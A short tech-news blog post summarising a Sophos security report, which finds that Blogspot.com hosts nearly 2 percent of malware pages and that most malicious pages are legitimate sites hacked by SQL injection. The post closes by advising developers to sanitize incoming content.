File Under: Web Basics

Blogspot Domain Most Likely Place to Catch a Virus

BloggerlogoThe web is dangerous place, viruses, malware and other threats lurk seemingly everywhere and things are getting worse. At least that the word from Sophos, a security company that tracks viruses and malware threats.

According to a report Sophos just released, the company detects a page with malicious content every 5 seconds, which is three times more than it found in 2007.

It probably wasn’t the number one rating it was looking for, but Google’s Blogger service takes the top honors for Most Likely to Give You a Virus — the Blogspot.com domain accounts for nearly 2 percent of all malware pages.

Given that Blogger offers a “next blog” link at the top of most sites, which will take you to a random blog, it’s particularly problematic for overly trusting users.

The other troubling aspect of Sophos report is the news that over 90 percent of the pages spreading Trojans and spyware are legitimate websites (some belonging to Fortune 500 companies) that have been hacked through SQL injection.

The most common technique is to sneak a snippet of HTML code onto a legitimate site through an SQL-injection attack. The HTML is generally a single pixel element that then loads malicious code from an outside site. It’s a tough problem for security software because to effectively block such sites would mean blocking what is an otherwise legitimate site.

If there’s one single takeaway from Sophos’ report it’s that web developers aren’t following best practices, or even taking basic security precautions. We’ve said it before and we’ll keep saying it: sanitize all incoming content before you run your database operations.

[via CNet]

See Also: